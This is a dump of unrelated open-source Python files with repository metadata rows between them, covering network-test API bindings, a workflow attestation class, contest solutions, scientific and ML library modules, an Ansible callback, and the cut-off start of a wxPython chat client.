- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.tlvprofile.value_ac1d7b13584a86b9cf1c28dca3390bca import Value
if self._properties.get('Value', None) is not None:
return self._properties.get('Value')
else:
return Value(self)._select()
@property
def Description(self):
# type: () -> str
"""
Returns
-------
- str: Description of the tlv
"""
return self._get_attribute(self._SDM_ATT_MAP['Description'])
@Description.setter
def Description(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['Description'], value)
@property
def EnablePerSession(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Enable TLV per session
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnablePerSession']))
@property
def IsEnabled(self):
# type: () -> bool
"""
Returns
-------
- bool: Enables/disables this tlv
"""
return self._get_attribute(self._SDM_ATT_MAP['IsEnabled'])
@IsEnabled.setter
def IsEnabled(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['IsEnabled'], value)
@property
def Name(self):
# type: () -> str
"""
Returns
-------
- str: Name of the tlv
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@Name.setter
def Name(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['Name'], value)
def update(self, Description=None, IsEnabled=None, Name=None):
# type: (str, bool, str) -> SubTlv
"""Updates subTlv resource on the server.
This method has some named parameters with a type: obj (Multivalue).
The Multivalue class has documentation that details the possible values for those named parameters.
Args
----
- Description (str): Description of the tlv
- IsEnabled (bool): Enables/disables this tlv
- Name (str): Name of the tlv
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def add(self, Description=None, IsEnabled=None, Name=None):
# type: (str, bool, str) -> SubTlv
"""Adds a new subTlv resource on the json, only valid with config assistant
Args
----
- Description (str): Description of the tlv
- IsEnabled (bool): Enables/disables this tlv
- Name (str): Name of the tlv
Returns
-------
- self: This instance with all currently retrieved subTlv resources using find and the newly added subTlv resources available through an iterator or index
Raises
------
- Exception: if this function is not being used with config assistance
"""
return self._add_xpath(self._map_locals(self._SDM_ATT_MAP, locals()))
def find(self, Description=None, IsEnabled=None, Name=None):
# type: (str, bool, str) -> SubTlv
"""Finds and retrieves subTlv resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve subTlv resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all subTlv resources from the server.
Args
----
- Description (str): Description of the tlv
- IsEnabled (bool): Enables/disables this tlv
- Name (str): Name of the tlv
Returns
-------
- self: This instance with matching subTlv resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of subTlv data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the subTlv resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def get_device_ids(self, PortNames=None, EnablePerSession=None):
"""Base class infrastructure that gets a list of subTlv device ids encapsulated by this object.
Use the optional regex parameters in the method to refine the list of device ids encapsulated by this object.
Args
----
- PortNames (str): optional regex of port names
- EnablePerSession (str): optional regex of enablePerSession
Returns
-------
- list(int): A list of device ids that meets the regex criteria provided in the method parameters
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._get_ngpf_device_ids(locals())
| [
"[email protected]"
] | |
57b1d19b7a5e95e9e467c34419f47bb1f739192c | c124cd627d1cd2ecc2056a932db4c5c3203943f2 | /MPSAppt/core/containers/attest.py | 2536a3c36e1f8b87c51e74ab01d0f30f4dde7928 | [] | no_license | longooglite/mps | 8fb2093b6a9f483a2ce4543949f7cbf0b280a1f1 | fd8c0d1491b80074fdf5a8c923d50e55a1991ad0 | refs/heads/master | 2021-01-10T08:17:15.852252 | 2016-02-29T21:07:04 | 2016-02-29T21:07:04 | 52,824,830 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,311 | py | # [Copyright]
# SmartPath v1.0
# Copyright 2014-2015 Mountain Pass Solutions, Inc.
# This unpublished material is proprietary to Mountain Pass Solutions, Inc.
# [End Copyright]
from MPSAppt.core.containers.task import Task
import MPSAppt.services.attestService as attestSvc
import MPSAppt.services.jobActionService as jaService
import MPSAppt.services.uberGapService as uberGapSvc
import MPSAppt.utilities.environmentUtils as envUtils
import MPSCore.utilities.stringUtilities as stringUtils
class Attest(Task):
def __init__(self, containerCode, parameterBlock):
Task.__init__(self, containerCode, parameterBlock)
self.setAttestation({})
# Initialization.
def initializeOnNewJobAction(self, _jobAction, _personDict, _profile, _now, _username, doCommit=True):
self.initializeItemSharingOnNewJobAction(_jobAction, _profile, _now, _username, doCommit=doCommit)
actionInfo = {}
if _personDict:
initItems = self.getConfigDict().get('initItems',[])
for initItem in initItems:
if initItem.has_key('findValidAttestation'):
findValidAttestation = initItem.get('findValidAttestation',[])
for validAttestConfig in findValidAttestation:
lookbackDays = validAttestConfig.get('lookbackDays',0)
codes = validAttestConfig.get('codes')
attestService = attestSvc.AttestService(self.getWorkflow().getConnection())
validAttest = attestService.findViableAttest(codes,lookbackDays,_personDict)
if validAttest:
validAttest['updated'] = _now
validAttest['id'] = None
jobTask = jaService.JobActionService(self.getWorkflow().getConnection()).getOrCreateJobTask(_jobAction,self,_now,_username)
validAttest['job_task_id'] = jobTask.get('id',-1)
attestService.updateAttestation(jobTask,validAttest)
else:
emailConfigs = validAttestConfig.get('emails')
if emailConfigs:
self.sendDirectiveEmail(emailConfigs,_personDict,_jobAction,self,_now,_profile)
actionInfo['grantCandidateAccess'] = True
return actionInfo
# Getters/Setters.
def getAttestation(self): return self._attestationDict
def setAttestation(self, __attestationDict): self._attestationDict = __attestationDict
# Data loading.
def loadInstance(self):
if self.getIsLoaded():
return
self.setIsLoaded(True)
if not self.getIsEnabled():
return
jobTask = self.getPrimaryJobTaskDict()
if jobTask:
resultDict = attestSvc.AttestService(self.getWorkflow().getConnection()).getAttestation(jobTask.get('id',0))
if resultDict:
self.setAttestation(resultDict)
# Directive emails.
def extendEmailContext(self, _emailContext):
# Add/Change elements in the given _emailContext.
env = envUtils.getEnvironment()
appCode = env.getAppCode()
loginURI = env.getLoginUri()
siteApplications = self.getWorkflow().getUserProfile().get('siteProfile',{}).get('siteApplications',[])
urlPrefix = env.getApplicationURLPrefix(appCode, siteApplications)
externalKey = self.getWorkflow().getJobActionDict().get('external_key', '')
_emailContext['candidate_url'] = "%s%s/%s" % (urlPrefix, loginURI, externalKey)
# Everything else.
def getDataDict(self, _sitePreferences):
self.loadInstance()
if self.getIsEnabled():
prefix = '/appt/jobaction/attest'
jobActionIdStr = str(self.getWorkflow().getJobActionDict().get('id',0))
argTuple = (prefix, jobActionIdStr, self.getCode())
dataDict = {}
dataDict['url'] = '%s/%s/%s' % argTuple
dataDict['disabled'] = self.standardTaskDisabledCheck()
return dataDict
return {}
def getEditContext(self, _sitePreferences,isForPrint = False):
self.loadInstance()
if self.getIsEnabled():
context = self.getCommonEditContext(_sitePreferences)
context['url'] = self._getURL()
context['enable_print'] = self.getConfigDict().get('print_enabled',True)
context['button_text'] = 'Submit'
context['button_url'] = self._getURL('/appt/jobaction/attest/complete')
context['print_url'] = self._getURL('/appt/jobaction/attest/print')
context['prompts'] = self.dictifyPromptsList(self.getConfigDict().get('prompts',{}))
context.update(self.updateContextWithImage(self.getConfigDict().get('displayImage',False),
self.getConfigDict().get('displayImageScalePixelWidth',400),
self.getConfigDict().get('displayImageTaskCode',''),
isForPrint))
# the old way, left here for backward compatibility
# on new templates, use {tags} below
fullName = ''
candidate = jaService.JobActionService(self.getWorkflow().getConnection()).getCandidateDict(self.getWorkflow().getJobActionDict())
if candidate:
fullName = candidate.get('full_name')
context['candidate_name'] = fullName
context['submitText'] = self.getConfigDict().get('submitText','')
if '%s' in context['submitText']:
context['submitText'] = context['submitText'] % fullName.upper()
else:
# the new way, allows for a candidate or a system user to attest
if self._attestationDict.has_key('attestor_department'):
attestor_department = self._attestationDict.get('attestor_department','')
attestor_name = self._attestationDict.get('attestor_name','')
else:
attestor_name,attestor_department = self.getNameAndDepartment()
submitText = str(context['submitText'])
if submitText.find('{attestor_department}') > -1:
submitText=submitText.replace('{attestor_department}',attestor_department)
if submitText.find('{attestor_name}') > -1:
submitText=submitText.replace('{attestor_name}',attestor_name)
context['submitText'] = submitText
configKeyName = 'uberGapsConfig'
uberGapsConfig = self.getConfigDict().get(configKeyName, [])
if uberGapsConfig:
gapSoivice = uberGapSvc.UberGapService(self.getWorkflow().getConnection())
gaps = gapSoivice.processContainer(self, _sitePreferences, _configKeyName=configKeyName, _returnLocalizedDates=True)
if gaps:
context['gapsList'] = gaps
context['gapsEnforced'] = self.getConfigDict().get('uberGapsEnforced', True)
context['gapsEnforcedDescr'] = self.getConfigDict().get('uberGapsEnforcedText', '')
context['gapsPrintIntroText'] = self.getConfigDict().get('uberGapsPrintIntroText', '')
if context['gapsEnforced']:
context['disabled'] = True
return context
return {}
def getNameAndDepartment(self):
attestor_name = ''
isCandidate = self.hasPermission('apptCandidate')
if not isCandidate:
attestor_name = self.workflow.userProfile.get('userProfile',{}).get('userPreferences',{}).get('full_name''')
else:
candidate = jaService.JobActionService(self.workflow.connection).getCandidateDict(self.workflow.getJobActionDict())
if candidate:
attestor_name = candidate.get('full_name')
attestor_department = self.workflow.department.get('full_descr','')
return attestor_name.upper(),attestor_department.upper()
def _getURL(self, _prefix='/appt/jobaction/attest'):
jobActionIdStr = str(self.getWorkflow().getJobActionDict().get('id',0))
return '%s/%s/%s' % (_prefix, jobActionIdStr, self.getCode())
def isComplete(self):
self.loadInstance()
if self.getIsEnabled():
return self.getAttestation().get('complete', False)
return True
| [
"[email protected]"
] | |
6d167be378b64da8b761152a806b3267181938ac | a9f7e40e18c935fb004fe813f98e298ded0581af | /Unrated/NIKKEI_2019_Ex/NIKKEI_2019_Ex-G.py | 91c77f85fafefd28a617a6781617c33d96188fea | [] | no_license | happa64/AtCoder_Beginner_Contest | 2eb350f500f4bd65f5491b98cdf002ac9b174165 | 2526e72de9eb19d1e1c634dbd577816bfe39bc10 | refs/heads/master | 2023-07-08T15:13:51.449555 | 2021-08-11T14:18:09 | 2021-08-11T14:18:09 | 255,601,137 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 608 | py | # https://atcoder.jp/contests/nikkei2019-ex/submissions/18385907
# G - 回文スコア
import sys
from collections import Counter
sys.setrecursionlimit(10 ** 7)
f_inf = float('inf')
mod = 10 ** 9 + 7
def resolve():
S = input()
D = Counter(S)
even = 0
one = 0
for v in D.values():
if v % 2 == 0:
even += v
else:
if v != 1:
even += v - 1
one += 1
if one:
res = pow(even + 1, 2)
one -= 1
else:
res = pow(even, 2)
res += one
print(res)
if __name__ == '__main__':
resolve()
| [
"[email protected]"
] | |
98a0437b02ec91f9eb46d2cdc1a194709887c950 | ba9c4be2697d5299fee7adf1652152f92e789894 | /__init__.py | 37fc40a9722c542c9e6a902b473a04d95ad62b34 | [] | no_license | fabyc/nodux_in_invoice2note | 8ec180a585f83d732c8819d21454403d6639c3e3 | 5b2fb6548149c0ace5cfc2c8a56237c1c372fb0b | refs/heads/master | 2022-05-27T09:26:43.844978 | 2017-08-16T20:14:55 | 2017-08-16T20:14:55 | 260,091,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 304 | py | #This file is part of Tryton. The COPYRIGHT file at the top level of
#this repository contains the full copyright notices and license terms.
from trytond.pool import Pool
from .invoice import *
def register():
Pool.register(
Invoice,
module='nodux_in_invoice2note', type_='model')
| [
"[email protected]"
] | |
24848acbed36d1b8123122e0ce4c169f45274050 | ee0b9cd2424e634a212a6d9734af1eaedd40dfe0 | /jhub37_mantid_baseline/sasview-5.0.3/src/sas/qtgui/Plotting/SlicerModel.py | fcff73897d0b797ce5523cb2234f937919a6e72b | [
"BSD-3-Clause"
] | permissive | moving-northwards/Docker | 775755b4618c1a7946f540505b0178e119d294d1 | 8ef18fd8c6abb0608ce9b53187e53d00d3e4e9ae | refs/heads/master | 2023-05-26T08:42:58.634525 | 2021-06-15T08:41:08 | 2021-06-15T08:41:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,547 | py | from PyQt5 import QtGui
from PyQt5 import QtCore
import sas.qtgui.Utilities.GuiUtils as GuiUtils
class SlicerModel(object):
def __init__(self):
# Model representation of local parameters
self._model = QtGui.QStandardItemModel()
self.update_model = True
self._model.itemChanged.connect(self.setParamsFromModelItem)
def setModelFromParams(self):
"""
Set up the Qt model for data handling between controls
"""
parameters = self.getParams()
self._model.removeRows( 0, self._model.rowCount() )
# Crete/overwrite model items
for parameter in list(parameters.keys()):
item1 = QtGui.QStandardItem(parameter)
item2 = QtGui.QStandardItem(GuiUtils.formatNumber(parameters[parameter]))
self._model.appendRow([item1, item2])
self._model.setHeaderData(0, QtCore.Qt.Horizontal, "Parameter")
self._model.setHeaderData(1, QtCore.Qt.Horizontal, "Value")
def setParamsFromModel(self):
"""
Set up the params dictionary based on the current model content.
"""
params = self.getParams()
for row_index in range(self._model.rowCount()):
#index = self._model.indexFromItem(item)
#row_index = index.row()
param_name = str(self._model.item(row_index, 0).text())
params[param_name] = float(self._model.item(row_index, 1).text())
self.update_model = False
self.setParams(params)
self.update_model = True
def setParamsFromModelItem(self, item):
"""
Set up the params dictionary for the parameter in item.
"""
params = self.getParams()
index = self._model.indexFromItem(item)
row_index = index.row()
param_name = str(self._model.item(row_index, 0).text())
params[param_name] = float(self._model.item(row_index, 1).text())
self.update_model = False
self.setParams(params)
self.update_model = True
def model(self):
'''getter for the model'''
return self._model
def getParams(self):
''' pure virtual '''
raise NotImplementedError("Parameter getter must be implemented in derived class.")
def setParams(self):
''' pure virtual '''
raise NotImplementedError("Parameter setter must be implemented in derived class.")
def validate(self):
''' pure virtual '''
raise NotImplementedError("Validator must be implemented in derived class.")
| [
"[email protected]"
] | |
b34ec6fea05408a0f8b07b708fd7b9eb9aff1f36 | 54b8fa244ff0dae2018efedcb81e1bb03376e5e2 | /test/functional/test_framework/bignum.py | 5af132b8a1480c8b1b2ec58ba88da0a3e971c468 | [
"MIT"
] | permissive | afghany/castletmp | e15677a88f9a1878486b6becf93d26c0ee9dbeaf | 9d0daed2a6abaf7d93f9308f5c602db6eeb42c8b | refs/heads/master | 2022-11-27T14:58:47.802781 | 2020-08-08T21:26:12 | 2020-08-08T21:26:12 | 284,464,002 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,913 | py | #!/usr/bin/env python3
#
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Big number routines.
This file is copied from python-bitcoinlib.
"""
import struct
# generic big endian MPI format
def bn_bytes(v, have_ext=False):
ext = 0
if have_ext:
ext = 1
return ((v.bit_length()+7)//8) + ext
def bn2bin(v):
s = bytearray()
i = bn_bytes(v)
while i > 0:
s.append((v >> ((i-1) * 8)) & 0xff)
i -= 1
return s
def bin2bn(s):
l = 0
for ch in s:
l = (l << 8) | ch
return l
def bn2mpi(v):
have_ext = False
if v.bit_length() > 0:
have_ext = (v.bit_length() & 0x07) == 0
neg = False
if v < 0:
neg = True
v = -v
s = struct.pack(b">I", bn_bytes(v, have_ext))
ext = bytearray()
if have_ext:
ext.append(0)
v_bin = bn2bin(v)
if neg:
if have_ext:
ext[0] |= 0x80
else:
v_bin[0] |= 0x80
return s + ext + v_bin
def mpi2bn(s):
if len(s) < 4:
return None
s_size = bytes(s[:4])
v_len = struct.unpack(b">I", s_size)[0]
if len(s) != (v_len + 4):
return None
if v_len == 0:
return 0
v_str = bytearray(s[4:])
neg = False
i = v_str[0]
if i & 0x80:
neg = True
i &= ~0x80
v_str[0] = i
v = bin2bn(v_str)
if neg:
return -v
return v
# castle-specific little endian format, with implicit size
def mpi2vch(s):
r = s[4:] # strip size
r = r[::-1] # reverse string, converting BE->LE
return r
def bn2vch(v):
return bytes(mpi2vch(bn2mpi(v)))
def vch2mpi(s):
r = struct.pack(b">I", len(s)) # size
r += s[::-1] # reverse string, converting LE->BE
return r
def vch2bn(s):
return mpi2bn(vch2mpi(s))
| [
"[email protected]"
] | |
d2fbd07c92fe745b47740d4e7405fae4d80d92f0 | a1bffcd8854e1843e56bb812d4d83b3161a5211e | /plugins/callback/oneline.py | 2e5d07c5de90f3cd6d0c6d71b3ec59da0414ebd9 | [] | no_license | goneri/ansible.community | 1a71f9d98c164b77f8ed2ed7f558b4963005ff8f | f26f612dd0a3154050d90b51a75502018c95f6e4 | refs/heads/master | 2020-12-29T07:47:35.353515 | 2020-01-22T17:43:18 | 2020-01-22T17:43:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,520 | py | # (c) 2012-2014, Michael DeHaan <[email protected]>
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
callback: oneline
type: stdout
short_description: oneline Ansible screen output
description:
- This is the output callback used by the -o/--one-line command line option.
'''
from ansible.plugins.callback import CallbackBase
from ansible import constants as C
class CallbackModule(CallbackBase):
'''
This is the default callback interface, which simply prints messages
to stdout when new callback events are received.
'''
CALLBACK_VERSION = 2.0
CALLBACK_TYPE = 'stdout'
CALLBACK_NAME = 'ansible.community.oneline'
def _command_generic_msg(self, hostname, result, caption):
stdout = result.get('stdout', '').replace('\n', '\\n').replace('\r', '\\r')
if 'stderr' in result and result['stderr']:
stderr = result.get('stderr', '').replace('\n', '\\n').replace('\r', '\\r')
return "%s | %s | rc=%s | (stdout) %s (stderr) %s" % (hostname, caption, result.get('rc', -1), stdout, stderr)
else:
return "%s | %s | rc=%s | (stdout) %s" % (hostname, caption, result.get('rc', -1), stdout)
def v2_runner_on_failed(self, result, ignore_errors=False):
if 'exception' in result._result:
if self._display.verbosity < 3:
# extract just the actual error message from the exception text
error = result._result['exception'].strip().split('\n')[-1]
msg = "An exception occurred during task execution. To see the full traceback, use -vvv. The error was: %s" % error
else:
msg = "An exception occurred during task execution. The full traceback is:\n" + result._result['exception'].replace('\n', '')
if result._task.action in C.MODULE_NO_JSON and 'module_stderr' not in result._result:
self._display.display(self._command_generic_msg(result._host.get_name(), result._result, 'FAILED'), color=C.COLOR_ERROR)
else:
self._display.display(msg, color=C.COLOR_ERROR)
self._display.display("%s | FAILED! => %s" % (result._host.get_name(), self._dump_results(result._result, indent=0).replace('\n', '')),
color=C.COLOR_ERROR)
def v2_runner_on_ok(self, result):
if result._result.get('changed', False):
color = C.COLOR_CHANGED
state = 'CHANGED'
else:
color = C.COLOR_OK
state = 'SUCCESS'
if result._task.action in C.MODULE_NO_JSON and 'ansible_job_id' not in result._result:
self._display.display(self._command_generic_msg(result._host.get_name(), result._result, state), color=color)
else:
self._display.display("%s | %s => %s" % (result._host.get_name(), state, self._dump_results(result._result, indent=0).replace('\n', '')),
color=color)
def v2_runner_on_unreachable(self, result):
self._display.display("%s | UNREACHABLE!: %s" % (result._host.get_name(), result._result.get('msg', '')), color=C.COLOR_UNREACHABLE)
def v2_runner_on_skipped(self, result):
self._display.display("%s | SKIPPED" % (result._host.get_name()), color=C.COLOR_SKIP)
| [
"[email protected]"
] | |
b43c93f012b04f452b69ddcc2add80dc65a7ac0a | 588f4991cad99f517ca5028e0e41c5b4d5252543 | /contest/abc128/C.py | d515f27cb54e9ca99721b1cfb2e8eefcf66a93e6 | [
"MIT"
] | permissive | mola1129/atcoder | 3002ff38cabf0ccb5142bd576ed90419fccde02e | 1d3b18cb92d0ba18c41172f49bfcd0dd8d29f9db | refs/heads/master | 2020-06-16T12:24:49.609707 | 2020-03-14T15:58:42 | 2020-03-14T15:58:42 | 195,571,664 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 606 | py | N,M = map(int, input().split())
connect = [[0,0,0]]
on_off = [0]*(N+1)
result = 0
for _ in range(M):
k = list(map(int, input().split()))
connect.append(k[1:])
p = list(map(int, input().split()))
for cnt in range(0,2**N):
bin_str = list(format(cnt, 'b'))
i = len(on_off)-len(bin_str)
for num in bin_str:
on_off[i] = int(num)
i += 1
for i in range(1,M+1):
total = 0
for j in connect[i]:
total += on_off[j]
if total % 2 != p[i-1]:
break
elif i == M:
result += 1
print(result)
| [
"[email protected]"
] | |
02bebd325a4f76630ff5661c2d8ce5290d849fec | 6f0ceee714bccf2a89c34a06aabd3bcb781a2fa4 | /python/mxnet/gluon/probability/distributions/chi2.py | 7b74683cb09c074f9ac0c521dbf91f8135d864c2 | [
"Apache-2.0",
"MIT",
"Unlicense",
"BSL-1.0",
"NCSA",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause",
"OFL-1.0",
"BSD-2-Clause-Views",
"Zlib"
] | permissive | yajiedesign/mxnet | 5a495fd06dd1730c17d2d27d7e46c8a770847f17 | 8e5a16cf673db5aceb48d2cf7a0fc1abd0ee5e51 | refs/heads/master | 2021-03-30T22:37:18.603396 | 2020-10-23T06:40:17 | 2020-10-23T06:40:17 | 43,763,550 | 214 | 59 | Apache-2.0 | 2020-06-01T23:31:15 | 2015-10-06T16:36:40 | C++ | UTF-8 | Python | false | false | 1,620 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
# pylint: disable=wildcard-import
"""Chi-sqaure distribution"""
__all__ = ['Chi2']
from .gamma import Gamma
from .constraint import Positive
class Chi2(Gamma):
r"""Create a Chi2 distribution object.
Chi2(df) is equivalent to Gamma(shape=df / 2, scale=2)
Parameters
----------
df : Tensor or scalar, default 0
Shape parameter of the distribution.
F : mx.ndarray or mx.symbol.numpy._Symbol or None
Variable recording running mode, will be automatically
inferred from parameters if declared None.
"""
# pylint: disable=abstract-method
arg_constraints = {'df': Positive()}
def __init__(self, df, F=None, validate_args=None):
super(Chi2, self).__init__(df / 2, 2, F, validate_args)
@property
def df(self):
return self.shape * 2
| [
"[email protected]"
] | |
9e9f021e5c2d6c9d246028e2905aa22f9a704361 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/p4VQE/R3/benchmark/startPyquil254.py | ae770cd6c05beda2d5d3a22c59f0cde3c69686d1 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,254 | py | # qubit number=4
# total number=14
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
prog = Program() # circuit begin
prog += H(0) # number=1
prog += H(1) # number=2
prog += H(2) # number=3
prog += CNOT(0,2) # number=11
prog += X(2) # number=12
prog += CNOT(0,2) # number=13
prog += H(3) # number=4
prog += Y(3) # number=5
prog += SWAP(1,0) # number=7
prog += SWAP(1,0) # number=8
prog += Y(0) # number=9
prog += Y(0) # number=10
# circuit end
return prog
def summrise_results(bitstrings) -> dict:
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('4q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil254.csv","w")
print(summrise_results(bitstrings),file=writefile)
writefile.close()
| [
"[email protected]"
] | |
3ce1c4f46a991d070a0f622b26e7320bd65e0cc6 | bc6492a9a30ac7228caad91643d58653b49ab9e3 | /sympy/series/benchmarks/bench_limit.py | 06fd12c97e72d64b577dd4d469f61cc9efec5885 | [] | no_license | cosmosZhou/sagemath | 2c54ea04868882340c7ef981b7f499fb205095c9 | 0608b946174e86182c6d35d126cd89d819d1d0b8 | refs/heads/master | 2023-01-06T07:31:37.546716 | 2020-11-12T06:39:22 | 2020-11-12T06:39:22 | 311,177,322 | 1 | 0 | null | 2020-11-12T06:09:11 | 2020-11-08T23:42:40 | Python | UTF-8 | Python | false | false | 158 | py | from __future__ import print_function, division
from sympy import Symbol, limit, oo
x = Symbol('x')
def timeit_limit_1x():
limit(1/x, x, oo)
| [
"[email protected]"
] | |
8d4245bbcb13287d8470f9f637b1762b06d211ae | 8b0267e7e1ac5b7e762f705597406ef2673b4755 | /segmentation/smp_local/encoders/__init__.py | 1665d2724b70bfe72329ee64151569ccf99dd2c2 | [] | no_license | jionie/Ultra-high-Resolution-EM-Images-Segmentation | f2f33cb8c279ca698abb49cee2fd6872fbf66df0 | b4389349e42310288bbc8704cdbdea6825598d8f | refs/heads/master | 2020-09-19T12:12:57.260517 | 2019-12-18T09:00:43 | 2019-12-18T09:00:43 | 224,227,599 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,040 | py | import functools
import torch.utils.model_zoo as model_zoo
from .resnet import resnet_encoders
from .dpn import dpn_encoders
from .vgg import vgg_encoders
from .senet import senet_encoders
from .densenet import densenet_encoders
from .inceptionresnetv2 import inceptionresnetv2_encoders
from .inceptionv4 import inceptionv4_encoders
from .efficientnet import efficient_net_encoders
from ._preprocessing import preprocess_input
encoders = {}
encoders.update(resnet_encoders)
encoders.update(dpn_encoders)
encoders.update(vgg_encoders)
encoders.update(senet_encoders)
encoders.update(densenet_encoders)
encoders.update(inceptionresnetv2_encoders)
encoders.update(inceptionv4_encoders)
encoders.update(efficient_net_encoders)
def get_encoder(name, encoder_weights=None):
Encoder = encoders[name]['encoder']
encoder = Encoder(**encoders[name]['params'])
encoder.out_shapes = encoders[name]['out_shapes']
if encoder_weights is not None:
settings = encoders[name]['pretrained_settings'][encoder_weights]
encoder.load_state_dict(model_zoo.load_url(settings['url']))
return encoder
def get_encoder_names():
return list(encoders.keys())
def get_preprocessing_params(encoder_name, pretrained='imagenet'):
settings = encoders[encoder_name]['pretrained_settings']
if pretrained not in settings.keys():
raise ValueError('Avaliable pretrained options {}'.format(settings.keys()))
formatted_settings = {}
formatted_settings['input_space'] = settings[pretrained].get('input_space')
formatted_settings['input_range'] = settings[pretrained].get('input_range')
formatted_settings['mean'] = settings[pretrained].get('mean')
formatted_settings['std'] = settings[pretrained].get('std')
return formatted_settings
def get_preprocessing_fn(encoder_name, pretrained='imagenet'):
params = get_preprocessing_params(encoder_name, pretrained=pretrained)
return functools.partial(preprocess_input, **params)
| [
"[email protected]"
] | |
dc993c018a89e7c21f48d7f0f3123050933aa7fe | 6ddd74b228cebf0a09be584611e914391725f778 | /readsource/bottle/bottlefirst.py | 37bd284af1be0fdd350ea595a37880f4a4e1f569 | [] | no_license | kekefeng/gitproject | 98435b89ae5bdc63ceed3981438ec3041927da87 | 920c0791e8db69b27d5cffc76c9dd8f90ca2525e | refs/heads/master | 2020-04-22T03:26:00.135817 | 2019-03-18T04:58:06 | 2019-03-18T04:58:06 | 170,086,442 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 300 | py | from bottle import Bottle, run, template, route
app = Bottle()
#@app.route('/hello/<name:re:[a-z]+>/zzx/kk/<id:int>')
@app.route('/hello/<name:int>')
def greet(name='Stranger'):
return template('Hello {{name}}, how are you?', name=name)
run(app, host='localhost', port=5000, server='wsgiref')
| [
"[email protected]"
] | |
557a7f5b19846ab4ef99b079dc66bebd3ca574d5 | f3af143bada7f79db1e15b4386e5107bc99eb212 | /ProjectBaseTest1/工具练习/10-文字聊天室/client.py | 70ba7d7f25e6fa1e4bf62d351835bf7540105b10 | [] | no_license | xxxfly/PythonStudy | a5ceae1d2b16cfdba19871507458154fc292bca0 | 478d89ccefc91a84f935aebdca796c9d4c23ef61 | refs/heads/master | 2022-04-08T13:45:03.405768 | 2020-03-09T03:47:50 | 2020-03-09T03:47:50 | 45,187,749 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 5,604 | py | #-*-coding:utf-8-*-
import wx
import telnetlib
from time import sleep
import _thread as thread
import random
import re
class LoginFrame(wx.Frame):
"""
登录窗口
"""
def __init__(self,parent,id,title,size):
#初始化,添加控件并绑定事件
wx.Frame.__init__(self,parent,id,title)
self.SetSize(size)
self.Center()
self.serverAddressLable=wx.StaticText(self,label="Server Address",pos=(10,50),size=(120,25))
self.userNameLabel=wx.StaticText(self,label="UserName",pos=(40,100),size=(120,25))
self.serverAddress=wx.TextCtrl(self,pos=(120,47),size=(150,25))
self.userName=wx.TextCtrl(self,pos=(120,97),size=(150,25))
self.loginButton=wx.Button(self,label="Login",pos=(80,145),size=(130,30))
#绑定登录方法
self.loginButton.Bind(wx.EVT_BUTTON,self.login)
self.Show()
def login(self,event):
#处理登录
try:
serverAddress=self.serverAddress.GetLineText(0).split(':')
address=serverAddress[0]
port=serverAddress[1]
con.open(address,port=int(port),timeout=10)
